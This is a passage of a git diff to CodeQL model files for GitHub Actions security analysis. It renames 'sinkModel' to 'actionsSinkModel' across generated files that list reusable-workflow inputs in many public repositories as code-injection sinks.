@@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["actions/reusable-workflows/.github/workflows/update-config-files.yml", "*", "input.base-pr-branch", "code-injection", "generated"] - ["actions/reusable-workflows/.github/workflows/update-config-files.yml", "*", "input.head-pr-branch", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/adap_flower.model.yml b/ql/lib/ext/generated/reusable-workflows/adap_flower.model.yml index 793136cc3d3..e66e7326701 100644 --- a/ql/lib/ext/generated/reusable-workflows/adap_flower.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/adap_flower.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["adap/flower/.github/workflows/_docker-build.yml", "*", "input.namespace-repository", "code-injection", "generated"] - ["adap/flower/.github/workflows/_docker-build.yml", "*", "input.file-dir", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/aio-libs_multidict.model.yml b/ql/lib/ext/generated/reusable-workflows/aio-libs_multidict.model.yml index e46601a7bff..471ce3a672a 100644 --- a/ql/lib/ext/generated/reusable-workflows/aio-libs_multidict.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/aio-libs_multidict.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["aio-libs/multidict/.github/workflows/reusable-build-wheel.yml", "*", "input.wheel-tags-to-skip", "code-injection", "generated"] - ["aio-libs/multidict/.github/workflows/reusable-build-wheel.yml", "*", "input.qemu", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/reusable-workflows/aio-libs_yarl.model.yml b/ql/lib/ext/generated/reusable-workflows/aio-libs_yarl.model.yml index 558ff908edf..1af30be9f35 100644 --- a/ql/lib/ext/generated/reusable-workflows/aio-libs_yarl.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/aio-libs_yarl.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["aio-libs/yarl/.github/workflows/reusable-build-wheel.yml", "*", "input.wheel-tags-to-skip", "code-injection", "generated"] - ["aio-libs/yarl/.github/workflows/reusable-build-wheel.yml", "*", "input.qemu", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/airbytehq_airbyte.model.yml b/ql/lib/ext/generated/reusable-workflows/airbytehq_airbyte.model.yml index a477e289d9e..ee3d9d0a8ef 100644 --- a/ql/lib/ext/generated/reusable-workflows/airbytehq_airbyte.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/airbytehq_airbyte.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["airbytehq/airbyte/.github/workflows/connector-performance-command.yml", "*", "input.connector", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/alphagov_collections.model.yml b/ql/lib/ext/generated/reusable-workflows/alphagov_collections.model.yml index a72ace81445..493594e3b81 100644 --- a/ql/lib/ext/generated/reusable-workflows/alphagov_collections.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/alphagov_collections.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["alphagov/collections/.github/workflows/pact-verify.yml", "*", "input.pact_artifact_file_to_verify", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/alphagov_frontend.model.yml b/ql/lib/ext/generated/reusable-workflows/alphagov_frontend.model.yml index 26c0794a19c..a437581ba83 100644 --- a/ql/lib/ext/generated/reusable-workflows/alphagov_frontend.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/alphagov_frontend.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["alphagov/frontend/.github/workflows/pact-verify.yml", "*", "input.pact_artifact_file_to_verify", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/alphagov_publishing-api.model.yml b/ql/lib/ext/generated/reusable-workflows/alphagov_publishing-api.model.yml index 5ad39d5e184..489e005cc0e 100644 --- a/ql/lib/ext/generated/reusable-workflows/alphagov_publishing-api.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/alphagov_publishing-api.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["alphagov/publishing-api/.github/workflows/pact-verify.yml", "*", "input.pact_artifact_file_to_verify", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/apache_druid.model.yml b/ql/lib/ext/generated/reusable-workflows/apache_druid.model.yml index 3c790f81d74..3a0e723e9f7 100644 --- a/ql/lib/ext/generated/reusable-workflows/apache_druid.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/apache_druid.model.yml 
@@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["apache/druid/.github/workflows/reusable-unit-tests.yml", "*", "input.module", "code-injection", "generated"] - ["apache/druid/.github/workflows/reusable-unit-tests.yml", "*", "input.jdk", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/apache_flink.model.yml b/ql/lib/ext/generated/reusable-workflows/apache_flink.model.yml index 50fdcfd5a2d..893be8a2725 100644 --- a/ql/lib/ext/generated/reusable-workflows/apache_flink.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/apache_flink.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["apache/flink/.github/workflows/template.flink-ci.yml", "*", "input.environment", "code-injection", "generated"] - ["apache/flink/.github/workflows/template.flink-ci.yml", "*", "input.workflow-caller-id", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/apache_spark.model.yml b/ql/lib/ext/generated/reusable-workflows/apache_spark.model.yml index 6363564503c..75877fa48aa 100644 --- a/ql/lib/ext/generated/reusable-workflows/apache_spark.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/apache_spark.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["apache/spark/.github/workflows/build_and_test.yml", "*", "input.branch", "code-injection", "generated"] - ["apache/spark/.github/workflows/build_and_test.yml", "*", "input.jobs", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/argilla-io_argilla.model.yml b/ql/lib/ext/generated/reusable-workflows/argilla-io_argilla.model.yml index fce736676fe..489e6134eba 100644 
--- a/ql/lib/ext/generated/reusable-workflows/argilla-io_argilla.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/argilla-io_argilla.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["argilla-io/argilla/.github/workflows/run-python-tests.yml", "*", "input.pytestArgs", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/argoproj_argo-cd.model.yml b/ql/lib/ext/generated/reusable-workflows/argoproj_argo-cd.model.yml index 593322a739e..4feef931f71 100644 --- a/ql/lib/ext/generated/reusable-workflows/argoproj_argo-cd.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/argoproj_argo-cd.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["argoproj/argo-cd/.github/workflows/image-reuse.yaml", "*", "input.docker_image_name", "code-injection", "generated"] - ["argoproj/argo-cd/.github/workflows/image-reuse.yaml", "*", "input.ghcr_image_name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/argoproj_argo-rollouts.model.yml b/ql/lib/ext/generated/reusable-workflows/argoproj_argo-rollouts.model.yml index b3984a7ab83..189cd8bbafd 100644 --- a/ql/lib/ext/generated/reusable-workflows/argoproj_argo-rollouts.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/argoproj_argo-rollouts.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["argoproj/argo-rollouts/.github/workflows/image-reuse.yaml", "*", "input.docker_image_name", "code-injection", "generated"] - ["argoproj/argo-rollouts/.github/workflows/image-reuse.yaml", "*", "input.ghcr_image_name", "code-injection", "generated"] 
diff --git a/ql/lib/ext/generated/reusable-workflows/aws-amplify_amplify-ui.model.yml b/ql/lib/ext/generated/reusable-workflows/aws-amplify_amplify-ui.model.yml index a6f1bd4569d..418694a596d 100644 --- a/ql/lib/ext/generated/reusable-workflows/aws-amplify_amplify-ui.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/aws-amplify_amplify-ui.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["aws-amplify/amplify-ui/.github/workflows/reusable-tagged-publish.yml", "*", "input.dist-tag", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/azure_apiops.model.yml b/ql/lib/ext/generated/reusable-workflows/azure_apiops.model.yml index b661a1fa26a..10c4f8a3e3c 100644 --- a/ql/lib/ext/generated/reusable-workflows/azure_apiops.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/azure_apiops.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["azure/apiops/tools/github_workflows/run-publisher-with-env.yaml", "*", "input.API_MANAGEMENT_SERVICE_OUTPUT_FOLDER_PATH", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/azure_mlops-templates.model.yml b/ql/lib/ext/generated/reusable-workflows/azure_mlops-templates.model.yml index 0f58971041d..1837a505499 100644 --- a/ql/lib/ext/generated/reusable-workflows/azure_mlops-templates.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/azure_mlops-templates.model.yml 
@@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["azure/mlops-templates/.github/workflows/tf-gha-install-terraform.yml", "*", "input.terraform_workingdir", "code-injection", "generated"] - ["azure/mlops-templates/.github/workflows/run-pipeline.yml", "*", "input.parameters-file", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/bbq-beets_avocaddo-cmw.model.yml b/ql/lib/ext/generated/reusable-workflows/bbq-beets_avocaddo-cmw.model.yml index f12a337d71d..094e4602e8e 100644 --- a/ql/lib/ext/generated/reusable-workflows/bbq-beets_avocaddo-cmw.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/bbq-beets_avocaddo-cmw.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["bbq-beets/avocaddo-cmw/.github/workflows/mobile-ci-cd.yml", "*", "input.git-user-email", "code-injection", "generated"] - ["bbq-beets/avocaddo-cmw/.github/workflows/mobile-ci-cd.yml", "*", "input.git-user-name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/bbq-beets_mobile-ci-cd.model.yml b/ql/lib/ext/generated/reusable-workflows/bbq-beets_mobile-ci-cd.model.yml index 76796b4ae38..ec264f96bf1 100644 --- a/ql/lib/ext/generated/reusable-workflows/bbq-beets_mobile-ci-cd.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/bbq-beets_mobile-ci-cd.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["bbq-beets/mobile-ci-cd/.github/workflows/mobile-ci-cd.yml", "*", "input.git-user-email", "code-injection", "generated"] - ["bbq-beets/mobile-ci-cd/.github/workflows/mobile-ci-cd.yml", "*", "input.git-user-name", "code-injection", "generated"] 
diff --git a/ql/lib/ext/generated/reusable-workflows/bbq-beets_yujincat-action.model.yml b/ql/lib/ext/generated/reusable-workflows/bbq-beets_yujincat-action.model.yml index 8cc08edff5d..7463396b152 100644 --- a/ql/lib/ext/generated/reusable-workflows/bbq-beets_yujincat-action.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/bbq-beets_yujincat-action.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["bbq-beets/yujincat-action/.github/workflows/test-referInputs.yml", "*", "input.shell", "code-injection", "generated"] - ["bbq-beets/yujincat-action/.github/workflows/test-referInputs.yml", "*", "input.environment", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/bdunderscore_modular-avatar.model.yml b/ql/lib/ext/generated/reusable-workflows/bdunderscore_modular-avatar.model.yml index c2963eb76f4..4c52a10d4f1 100644 --- a/ql/lib/ext/generated/reusable-workflows/bdunderscore_modular-avatar.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/bdunderscore_modular-avatar.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["bdunderscore/modular-avatar/.github/workflows/build-test-docs.yml", "*", "input.path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/benc-uk_workflow-dispatch.model.yml b/ql/lib/ext/generated/reusable-workflows/benc-uk_workflow-dispatch.model.yml index 66aea90b41a..a6c5a8b8e3b 100644 --- a/ql/lib/ext/generated/reusable-workflows/benc-uk_workflow-dispatch.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/benc-uk_workflow-dispatch.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["benc-uk/workflow-dispatch/.github/workflows/echo-3.yaml", "*", "input.message", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/bridgecrewio_checkov.model.yml b/ql/lib/ext/generated/reusable-workflows/bridgecrewio_checkov.model.yml index 49ed7bca899..286e75fc9e2 100644 --- a/ql/lib/ext/generated/reusable-workflows/bridgecrewio_checkov.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/bridgecrewio_checkov.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["bridgecrewio/checkov/tests/github_actions/resources/.github/workflows/docker-slsa.yaml", "*", "input.REGISTRY", "code-injection", "generated"] - ["bridgecrewio/checkov/tests/github_actions/resources/.github/workflows/docker-slsa.yaml", "*", "input.IMAGE_NAME", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/bugsnag_bugsnag-ruby.model.yml b/ql/lib/ext/generated/reusable-workflows/bugsnag_bugsnag-ruby.model.yml index fd0a2d9110a..9ea5a9a34c7 100644 --- a/ql/lib/ext/generated/reusable-workflows/bugsnag_bugsnag-ruby.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/bugsnag_bugsnag-ruby.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["bugsnag/bugsnag-ruby/.github/workflows/run-maze-runner.yml", "*", "input.features", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/bytecodealliance_wasm-micro-runtime.model.yml b/ql/lib/ext/generated/reusable-workflows/bytecodealliance_wasm-micro-runtime.model.yml index 1a3bdd1b380..34e41e9c589 100644 
--- a/ql/lib/ext/generated/reusable-workflows/bytecodealliance_wasm-micro-runtime.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/bytecodealliance_wasm-micro-runtime.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["bytecodealliance/wasm-micro-runtime/.github/workflows/reuse_latest_release_binaries.yml", "*", "input.the_path", "code-injection", "generated"] - ["bytecodealliance/wasm-micro-runtime/.github/workflows/reuse_latest_release_binaries.yml", "*", "input.last_commit", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/celo-org_celo-blockchain.model.yml b/ql/lib/ext/generated/reusable-workflows/celo-org_celo-blockchain.model.yml index 6185f9d03d0..cc38156973b 100644 --- a/ql/lib/ext/generated/reusable-workflows/celo-org_celo-blockchain.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/celo-org_celo-blockchain.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["celo-org/celo-blockchain/.github/workflows/add-docker-tag.yaml", "*", "input.destination-tag", "code-injection", "generated"] - ["celo-org/celo-blockchain/.github/workflows/add-docker-tag.yaml", "*", "input.origin-tag", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/cemu-project_cemu.model.yml b/ql/lib/ext/generated/reusable-workflows/cemu-project_cemu.model.yml index 273bbc69540..748287e75f8 100644 --- a/ql/lib/ext/generated/reusable-workflows/cemu-project_cemu.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/cemu-project_cemu.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["cemu-project/cemu/.github/workflows/build.yml", "*", "input.experimentalversion", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/cesiumgs_cesium-unreal.model.yml b/ql/lib/ext/generated/reusable-workflows/cesiumgs_cesium-unreal.model.yml index 3aac3af3cae..703a138d28d 100644 --- a/ql/lib/ext/generated/reusable-workflows/cesiumgs_cesium-unreal.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/cesiumgs_cesium-unreal.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["cesiumgs/cesium-unreal/.github/workflows/testWindows.yml", "*", "input.unreal-program-name", "code-injection", "generated"] - ["cesiumgs/cesium-unreal/.github/workflows/testWindows.yml", "*", "input.test-package-base-name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/cgal_cgal.model.yml b/ql/lib/ext/generated/reusable-workflows/cgal_cgal.model.yml index 9887b8e5f3a..97f1bafd1f3 100644 --- a/ql/lib/ext/generated/reusable-workflows/cgal_cgal.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/cgal_cgal.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["cgal/cgal/.github/workflows/send_email.yml", "*", "input.message", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/checkstyle_checkstyle.model.yml b/ql/lib/ext/generated/reusable-workflows/checkstyle_checkstyle.model.yml index 4c6379fd94b..064c946363f 100644 --- a/ql/lib/ext/generated/reusable-workflows/checkstyle_checkstyle.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/checkstyle_checkstyle.model.yml 
@@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["checkstyle/checkstyle/.github/workflows/release-upload-all-jar.yml", "*", "input.version", "code-injection", "generated"] - ["checkstyle/checkstyle/.github/workflows/release-update-xdoc-with-releasenotes.yml", "*", "input.version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/chia-network_actions.model.yml b/ql/lib/ext/generated/reusable-workflows/chia-network_actions.model.yml index 35738fe6c0f..4a5c66bc744 100644 --- a/ql/lib/ext/generated/reusable-workflows/chia-network_actions.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/chia-network_actions.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["chia-network/actions/.github/workflows/docker-build.yaml", "*", "input.docker-context", "code-injection", "generated"] - ["chia-network/actions/.github/workflows/docker-build.yaml", "*", "input.image_subpath", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/chipsalliance_chisel.model.yml b/ql/lib/ext/generated/reusable-workflows/chipsalliance_chisel.model.yml index 77db768cf32..a1e4b624b45 100644 --- a/ql/lib/ext/generated/reusable-workflows/chipsalliance_chisel.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/chipsalliance_chisel.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["chipsalliance/chisel/.github/workflows/test.yml", "*", "input.scala", "code-injection", "generated"] - ["chipsalliance/chisel/.github/workflows/test.yml", "*", "input.circt", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/reusable-workflows/clickhouse_clickhouse.model.yml b/ql/lib/ext/generated/reusable-workflows/clickhouse_clickhouse.model.yml index 509de954646..888aed947da 100644 --- a/ql/lib/ext/generated/reusable-workflows/clickhouse_clickhouse.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/clickhouse_clickhouse.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["clickhouse/clickhouse/.github/workflows/reusable_test.yml", "*", "input.test_name", "code-injection", "generated"] - ["clickhouse/clickhouse/.github/workflows/reusable_test.yml", "*", "input.run_command", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/cloudfoundry_cli.model.yml b/ql/lib/ext/generated/reusable-workflows/cloudfoundry_cli.model.yml index 6e0e2865e83..3b5f69e9342 100644 --- a/ql/lib/ext/generated/reusable-workflows/cloudfoundry_cli.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/cloudfoundry_cli.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["cloudfoundry/cli/.github/workflows/tests-integration-reusable.yml", "*", "input.os", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/cloudposse_github-action-matrix-outputs-write.model.yml b/ql/lib/ext/generated/reusable-workflows/cloudposse_github-action-matrix-outputs-write.model.yml index 69667ce10b1..8e28b46f2c7 100644 --- a/ql/lib/ext/generated/reusable-workflows/cloudposse_github-action-matrix-outputs-write.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/cloudposse_github-action-matrix-outputs-write.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["cloudposse/github-action-matrix-outputs-write/.github/workflows/setup-test.yml", "*", "input.matrix-key", "output.result", "taint", "manual"] diff --git a/ql/lib/ext/generated/reusable-workflows/cocotb_cocotb.model.yml b/ql/lib/ext/generated/reusable-workflows/cocotb_cocotb.model.yml index 175012c10c9..7f63b48ed84 100644 --- a/ql/lib/ext/generated/reusable-workflows/cocotb_cocotb.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/cocotb_cocotb.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["cocotb/cocotb/.github/workflows/regression-tests.yml", "*", "input.nox_session_test_sim", "code-injection", "generated"] - ["cocotb/cocotb/.github/workflows/regression-tests.yml", "*", "input.nox_session_test_nosim", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/codeigniter4_codeigniter4.model.yml b/ql/lib/ext/generated/reusable-workflows/codeigniter4_codeigniter4.model.yml index 84a834d9a1f..e7e42031e04 100644 --- a/ql/lib/ext/generated/reusable-workflows/codeigniter4_codeigniter4.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/codeigniter4_codeigniter4.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["codeigniter4/codeigniter4/.github/workflows/reusable-serviceless-phpunit-test.yml", "*", "input.extra-composer-options", "code-injection", "generated"] - ["codeigniter4/codeigniter4/.github/workflows/reusable-serviceless-phpunit-test.yml", "*", "input.php-version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/com-lihaoyi_mill.model.yml b/ql/lib/ext/generated/reusable-workflows/com-lihaoyi_mill.model.yml index 2946a78cf83..0c34609ccef 100644 
--- a/ql/lib/ext/generated/reusable-workflows/com-lihaoyi_mill.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/com-lihaoyi_mill.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["com-lihaoyi/mill/.github/workflows/run-mill-action.yml", "*", "input.millargs", "code-injection", "generated"] - ["com-lihaoyi/mill/.github/workflows/run-mill-action.yml", "*", "input.buildcmd", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/cosmos_ibc-go.model.yml b/ql/lib/ext/generated/reusable-workflows/cosmos_ibc-go.model.yml index 7ce68d84ca5..82de946e406 100644 --- a/ql/lib/ext/generated/reusable-workflows/cosmos_ibc-go.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/cosmos_ibc-go.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["cosmos/ibc-go/.github/workflows/e2e-test-workflow-call.yml", "*", "input.upgrade-plan-name", "code-injection", "generated"] - ["cosmos/ibc-go/.github/workflows/e2e-test-workflow-call.yml", "*", "input.chain-upgrade-tag", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/crowdsecurity_crowdsec.model.yml b/ql/lib/ext/generated/reusable-workflows/crowdsecurity_crowdsec.model.yml index 8e3b9ccc0f8..09c4c2a83c3 100644 --- a/ql/lib/ext/generated/reusable-workflows/crowdsecurity_crowdsec.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/crowdsecurity_crowdsec.model.yml 
@@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["crowdsecurity/crowdsec/.github/workflows/publish-docker.yml", "*", "input.latest", "code-injection", "generated"] - ["crowdsecurity/crowdsec/.github/workflows/publish-docker.yml", "*", "input.image_version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/cryptomator_cryptomator.model.yml b/ql/lib/ext/generated/reusable-workflows/cryptomator_cryptomator.model.yml index f41e2ee1246..0e4571fc728 100644 --- a/ql/lib/ext/generated/reusable-workflows/cryptomator_cryptomator.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/cryptomator_cryptomator.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["cryptomator/cryptomator/.github/workflows/get-version.yml", "*", "input.version", "code-injection", "generated"] - ["cryptomator/cryptomator/.github/workflows/av-whitelist.yml", "*", "input.url", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/daeuniverse_dae.model.yml b/ql/lib/ext/generated/reusable-workflows/daeuniverse_dae.model.yml index c643a6a9fe0..6a03acfb11d 100644 --- a/ql/lib/ext/generated/reusable-workflows/daeuniverse_dae.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/daeuniverse_dae.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["daeuniverse/dae/.github/workflows/seed-build.yml", "*", "input.pr-number", "code-injection", "generated"] - ["daeuniverse/dae/.github/workflows/seed-build.yml", "*", "input.build-type", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/reusable-workflows/dafny-lang_dafny.model.yml b/ql/lib/ext/generated/reusable-workflows/dafny-lang_dafny.model.yml index 9aad213b1df..f41ee1211d3 100644 --- a/ql/lib/ext/generated/reusable-workflows/dafny-lang_dafny.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/dafny-lang_dafny.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["dafny-lang/dafny/.github/workflows/publish-release-reusable.yml", "*", "input.name", "code-injection", "generated"] - ["dafny-lang/dafny/.github/workflows/publish-release-reusable.yml", "*", "input.tag_name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/dagger_dagger.model.yml b/ql/lib/ext/generated/reusable-workflows/dagger_dagger.model.yml index 1906ef45379..8a64c0ce5f1 100644 --- a/ql/lib/ext/generated/reusable-workflows/dagger_dagger.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/dagger_dagger.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - 